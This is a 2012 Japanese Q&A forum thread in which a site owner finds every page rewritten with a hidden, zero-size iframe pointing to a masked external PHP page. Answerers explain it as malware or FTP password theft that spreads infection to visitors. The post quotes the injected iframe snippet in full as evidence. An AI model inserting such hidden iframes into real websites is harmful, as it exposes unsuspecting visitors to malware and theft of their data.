WEBサイトの全ページが真っ白に。ウイルス？

全50ページほどのWEBサイトを運営しています。
サーバーはレンタルサーバーで、FTPソフトを使用してページをアップロードしています。

先日、トップページを開いたところレイアウトがぐちゃぐちゃになっていました。
（カラム落ちしたり、ヘッダーが表示されていなかったり。）
そして、index以下のページは全て真っ白、何も表示されていない状態に。

FTPソフトで見ると、サーバー側のファイルの更新時間が、朝の8：42～43に全ページ書き換えられていました。
もちろん何もさわっていません。

ローカルファイルを一括アップロードすると元通りに回復しました。

レンタルサーバー会社のお知らせに、
「メンテナンス時に不具合が生じたようで…」とのコメント。
サーバー側の不具合か？と思っていたのですが、

真っ白になったページのソースを見てみると<body>直下に

<!--1679091c5a880faf6fb5e6087eb1b2dc-->
<iframe src="www.○○.com/70cc.php?id=codeblockstat" width="0" height="0" style="display:none;" />
<!--/1679091c5a880faf6fb5e6087eb1b2dc-->

と入っていました。もちろんこんなタグは入れていません。

急いでアップロードし直したので全ページこれだったかは定かではありませんが
おそらく「style="display:none;"」は入っていたものと思われます。

「www.○○.com」にアクセスすると、わけのわからない真っ青な外国のページでした。
（ウイルスか何かだったらいけないと思い、URLは伏せました。）

サーバーの不具合でこんなソースが混入するものでしょうか？
サイトがサイトでしたので、何か意図的なソースの書き換えだったのではないかと考えています。

そういえば以前も、朝の9：13～15にかけてサーバー側のファイルが全ページ更新されていたことがあったのですが、その時は特に実害がなかった（ように思われた）ので、パスワードもそのままにしたと思います。

「ガンプラ―ウイルス」というものにも感染したことがあるので、心配です。
こういうのはどういう方がどういう目的で発信するんでしょうかねぇ…

何かご存知の方いらっしゃいましたら教えていただけませんでしょうか。
よろしくお願いいたします。

No.2 ベストアンサー 回答者： natukisin 回答日時： 2012/01/22 05:36

> <iframe src="www.○○.com/70cc.php?id=codeblockstat" width="0" height="0" style="display:none;" />

こんな「絶対に画面上に表示させない」ことを狙ったiframeの挿入はウイルスか不正アクセス意外には考えにくいと思います。
仮に「サーバー側の不具合」だったとしても障害の類ではなく不正アクセスやウイルス感染の類だと思われます。
サーバー運営者側が現在はまだ調査中で障害の詳細を発表できていない、という可能性は考えられますが、詳細が出ていて内容があくまでメンテナンス関連のものであれば、今回の件との関連は薄いでしょう。


それよりも気になるのは、
> 「www.○○.com」にアクセスすると、わけのわからない真っ青な外国のページでした。
何故、そんな怪しげなサイトにアクセスしちゃいますか？
該当のコードはそのサイトにユーザーをアクセスさせることが目的のコードですので、そこにアクセスした時点で一巻の終わりである可能性が非常に高いです。
アクセスすることでウイルスに感染させるなどというレベルでなく、既にウイルス感染したPCをそこにアクセスさせることで個人情報を根こそぎ引っこ抜いている可能性も十分に考えられます。
状況から、あなたのPC内のデータは全部外部に流出してしまった可能性を考慮しておくべきでしょう。

また、
> 「ガンプラ―ウイルス」というものにも感染したことがある
という経緯がありながら
> その時は特に実害がなかった（ように思われた）ので、パスワードもそのままにしたと思います。
という辺りも非常にぬるすぎます。
ほとんどダダ漏れじゃないですか。


> こういうのはどういう方がどういう目的で発信するんでしょうかねぇ…
ネットショッピングなどで利用するクレジットカードの情報などを奪う、などが主な目的です。
軽度なイタズラレベルでは、写真などの画像を抽出して、プライベートな恥ずかしい画像などがあればそれを本名・住所付きでネット上にばらまいたりする人もいますね。

仮にあなたのPCにはそのような情報がなく特に実害が無かったとしても、今回のようにFTPのパスワードを奪いあなたのサイトの情報を書き換えることで、あなたのサイトを信用して閲覧しに来る全てのユーザーに同様のウイルスを感染させ、そちらで実被害を大量に出します。
つまり、あなたがそういうウイルス対策を放置して適当に済ますことは、あなたの友人・知人に対して個人情報漏洩を幇助していることになるのです。

この回答へのお礼

ご回答ありがとうございます。

やはり、ウイルスの可能性大ですか…
考えが甘かったですね。ご指摘感謝いたします。

「www.○○.com」へは、興味本位と言いますか
ウイルスなどではないかもしれないという期待もあって
アクセスしてしまいました。

ということは？
サーバー運営会社の問題ではなく、当方のFTPソフトのセキュリティ対策が甘くパスワードを奪われてしまったために、今回の件が起きたというのが有力説でしょうかねぇ…

サーバー運営会社にも問い合わせしてみたいと思います。
こちらでもFTPソフトのパスワードをまめに変えるなどして対策をしていきます。

ありがとうございました。

お礼日時：2012/01/22 15:08

No.1 回答者： violet430 回答日時： 2012/01/22 03:04

レンタルサーバ会社へ確認すべきです。

その上で彼らが知らないということなら不正アクセスされた可能性があるということですね。もしそうなら今後はそのサーバを解約した方がいいと思います。

この回答へのお礼

早速のご回答感謝いたします。

はい、サーバー運営会社に問い合わせしてみることにします。

ありがとうございました。

お礼日時：2012/01/22 15:10